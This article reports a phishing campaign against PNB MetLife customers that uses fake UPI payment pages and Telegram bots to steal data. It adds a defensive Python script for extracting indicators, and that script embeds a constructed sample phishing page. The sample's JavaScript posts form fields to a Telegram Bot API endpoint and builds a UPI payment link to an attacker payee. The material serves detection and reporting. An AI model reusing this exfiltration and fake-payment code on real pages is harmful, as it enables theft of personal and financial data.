A sophisticated phishing campaign is targeting PNB MetLife insurance customers, using fake payment gateways to steal personal information and redirect victims to fraudulent UPI transactions. The scam exploits the trusted reputation of PNB MetLife by creating convincing mobile-optimized payment portals that mimic legitimate premium payment services. The malicious pages accept policy numbers and customer details without validation, forwarding captured data to attackers through automated channels.
The phishing operation spreads primarily through SMS messages, but email and social media platforms may also be used. When victims land on the fake payment gateways, they encounter professionally designed interfaces requesting basic information such as name, policy number, and mobile number. The pages deliberately avoid backend verification, accepting arbitrary values to maintain the illusion of legitimacy.
The campaign completes the fraudulent transactions through the victim's own genuine UPI apps, such as PhonePe, Paytm, and Google Pay. Nothing in those apps is compromised; the phishing page simply hands them a payment request whose payee is attacker-controlled, so the familiar app interface lowers the victim's suspicion and increases the likelihood of successful theft. Behind the polished front end, the exfiltration mechanism is simple but effective: the page's JavaScript calls the Telegram Bot API and silently posts captured details to attacker-controlled Telegram chats.
The stolen data includes names, policy numbers, and mobile numbers, transmitted field by field as the victim types, so information is captured even if the form is abandoned before it is submitted. The phishing flow then introduces urgency with a countdown timer and a QR code display, pressuring the victim to complete a UPI payment quickly. The JavaScript builds the UPI payment URI (a upi://pay link carrying the payee address, amount, and a display name) dynamically and renders it as a scannable QR code, so the funds go to an attacker-controlled account while the payment itself is approved inside a legitimate app.
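What those two mechanisms look like in a kit's page source, and how to pull the indicators out of a captured page for blocking and reporting, as an added Python example that is not part of the original report. The sample page, the bot token, the chat ID and the payee VPA in it are all constructed for illustration; the patterns assume the standard Telegram Bot API URL shape (`api.telegram.org/bot<id>:<secret>/<method>`) and the `upi://pay?pa=...` deep-link format, and the bare-VPA match is a heuristic, not a specification.

```python
"""Static triage of a captured phishing page for the two mechanisms the
campaign relies on: Telegram Bot API exfiltration and dynamically built UPI
payment intents.  Added example; the sample page below is constructed."""
import re
from urllib.parse import parse_qs

# Telegram Bot API calls look like https://api.telegram.org/bot<id>:<secret>/<method>
# The secret after the colon is 35 characters in current tokens.
TELEGRAM_RE = re.compile(
    r"api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)"
)
CHAT_ID_RE = re.compile(r"chat_id[\"']?\s*[:=]\s*[\"']?(-?\d+)")
# Literal UPI deep links: upi://pay?pa=<vpa>&pn=<name>&am=<amount>&cu=INR ...
UPI_URI_RE = re.compile(r"upi://pay\?[A-Za-z0-9%&=._@+\-]+")
# Heuristic for a bare VPA string literal: local@handle with no dot in the
# handle, which separates it from most e-mail addresses.  Assumption, not a spec.
VPA_RE = re.compile(r"[\"']([A-Za-z0-9._-]{2,}@[A-Za-z]{2,})[\"']")

# Constructed sample of a kit page: field-by-field exfiltration to a bot, a
# timer, and a UPI URI assembled at runtime from a hard-coded payee.
SAMPLE_PAGE = r"""
<form id="pay"><input name="name"><input name="policy"><input name="mobile"></form>
<div id="timer">05:00</div><canvas id="qr"></canvas>
<a href="upi://pay?pa=scam.collect@fakeupi&pn=PNB%20MetLife&am=4999&cu=INR">Pay now</a>
<script>
const BOT = "https://api.telegram.org/bot123456789:AAHfakeTOKENfakeTOKENfakeTOKEN01234/sendMessage";
const PAYEE = "scam.collect@fakeupi";
function exfil(field, value) {
  fetch(BOT, {method: "POST", body: JSON.stringify({chat_id: "-100987654321", text: field + ": " + value})});
}
document.querySelectorAll("#pay input").forEach(i => i.addEventListener("change", e => exfil(e.target.name, e.target.value)));
function showQr(amount) {
  const uri = "upi://pay?pa=" + PAYEE + "&pn=PNB%20MetLife&am=" + amount + "&cu=INR";
  renderQr(document.getElementById("qr"), uri);
}
</script>
"""


def parse_upi_uri(uri):
    """Return the payee (pa), display name (pn), amount (am), currency (cu)
    and note (tn) of a upi://pay link as plain strings; blank values are dropped."""
    query = uri.split("?", 1)[1]
    fields = parse_qs(query)
    return {k: fields[k][0] for k in ("pa", "pn", "am", "cu", "tn") if k in fields}


def redact_token(token):
    """Keep the numeric bot id (needed to report the bot) and mask the secret."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def triage_page(html):
    """Extract exfiltration and payment indicators from page source."""
    bots = [
        {"bot_id": m.group("token").split(":")[0],
         "token_redacted": redact_token(m.group("token")),
         "method": m.group("method")}
        for m in TELEGRAM_RE.finditer(html)
    ]
    chat_ids = sorted(set(CHAT_ID_RE.findall(html)))
    # A URI built at runtime leaves only the "upi://pay?pa=" prefix as a literal,
    # which parses to nothing; the payee then has to come from the VPA literal.
    upi_links = [p for p in (parse_upi_uri(u) for u in UPI_URI_RE.findall(html)) if p]
    payees = {link["pa"] for link in upi_links if "pa" in link}
    payees.update(VPA_RE.findall(html))
    return {
        "telegram_bots": bots,
        "chat_ids": chat_ids,
        "upi_links": upi_links,
        "payee_vpas": sorted(payees),
        "exfil_and_payment": bool(bots) and bool(payees),
    }


if __name__ == "__main__":
    for key, value in triage_page(SAMPLE_PAGE).items():
        print(f"{key}: {value}")
```

The bot ID and chat ID are what you hand to Telegram's abuse channel, and the payee VPA is what the bank or NPCI needs to freeze the receiving account; the token itself is masked so the report can be shared without leaking a live secret. Because the kit assembles the payment link at runtime, a scanner that only looks for complete `upi://pay?...` strings would miss the payee, which is why the script also harvests bare VPA literals.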
More advanced variants of the campaign go beyond payment fraud into full banking credential harvesting. These templates present a menu of policy-servicing options to look like a legitimate customer portal, and then request complete bank account details and debit card information. Everything submitted is exfiltrated through the same Telegram bots, which turns the operation from a one-off payment scam into identity and financial data theft that can be monetised long after the victim leaves the page.
Security researcher Anurag Gawande identified multiple variants of this phishing scheme and found that the attackers deployed the pages on free hosting platforms, which lets them stand up new sites and rotate away from taken-down ones quickly. The campaign shows a clear evolution in financial fraud tactics, moving from simple credential theft to multi-stage operations that combine data exfiltration with direct manipulation of the payment itself. Borrowing the trust of real payment apps and hiding the exfiltration in ordinary Telegram traffic makes the threat particularly effective. Users should treat premium-payment links arriving by SMS, email, or social media with suspicion, pay only through the insurer's official website or app, ignore countdown timers, and, before approving any UPI payment, check that the payee name and address displayed by the payment app actually belong to the insurer rather than to an individual or unknown merchant.
